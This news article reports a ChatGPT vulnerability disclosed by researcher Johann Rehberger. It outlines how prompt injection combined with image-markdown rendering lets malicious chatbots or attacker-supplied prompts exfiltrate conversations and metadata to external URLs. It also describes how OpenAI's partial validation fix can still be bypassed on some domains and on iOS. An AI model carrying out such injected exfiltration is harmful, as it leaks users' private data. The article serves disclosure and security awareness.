OpenAI says it has fixed a potentially serious ChatGPT flaw – but there could still be problems
A flaw in OpenAI’s popular language model, ChatGPT, has been discovered, potentially compromising users’ sensitive information. The flaw allowed details from conversations to be leaked to an external URL, raising concerns about data security and privacy. When a researcher, Johann Rehberger, tried to alert OpenAI about the flaw, he received no response. Faced with the lack of a resolution, Rehberger publicly disclosed the details of the flaw.
The identified vulnerability could enable malicious chatbots powered by ChatGPT to exfiltrate not only the content of the chat but also metadata and technical data. The flaw could be exploited through various methods, including a tactic where the victim submits a prompt provided by the attacker. Through image markdown rendering and prompt injecting, the attacker can extract the data.
Rehberger first reported the flaw to OpenAI in April 2023, and despite providing additional information on the potential risks in November, his efforts were met with silence. Feeling ignored by OpenAI, Rehberger opted to share his findings with the public to raise awareness and hold the company accountable. In a video demonstration, he showcased how a full conversation with a chatbot, designed to play tic-tac-toe, was extracted to a third-party URL.
OpenAI responded to the disclosure by implementing safety checks to mitigate the flaw. However, these measures do not fully address the issue. Rehberger discovered that arbitrary domains can still be rendered by ChatGPT, making the flaw viable. Although the new checks have been implemented on desktop versions, they do not cover the iOS mobile app, leaving users on that platform vulnerable.
Rehberger acknowledged the progress made by OpenAI but pointed out the remaining gaps. He noted that ChatGPT now performs validation API calls when a server returns an image tag with a hyperlink. However, he found that some arbitrary domains can still bypass the checks, leading to a hit-or-miss situation.
As ChatGPT is widely used for various purposes, such as customer support and content generation, the security flaw raises concerns about the privacy of user data. With the potential for sensitive information to be compromised, individuals and businesses using ChatGPT should exercise caution when discussing confidential matters through the platform.
OpenAI has not released a statement addressing the flaw or the partial mitigation implemented. Users are advised to remain vigilant while the company works on a complete fix. As the incident demonstrates, responsible disclosure and prompt remediation are crucial in ensuring the security of AI-powered systems. Users must continually evaluate the risks associated with using such technologies and stay informed about potential vulnerabilities that may arise.
In the age of advanced AI, ensuring the privacy and security of user data is paramount. While OpenAI claims to have fixed a potentially serious flaw in ChatGPT, the lingering gaps highlight the need for continuous improvement and vigilance in the face of evolving threats.
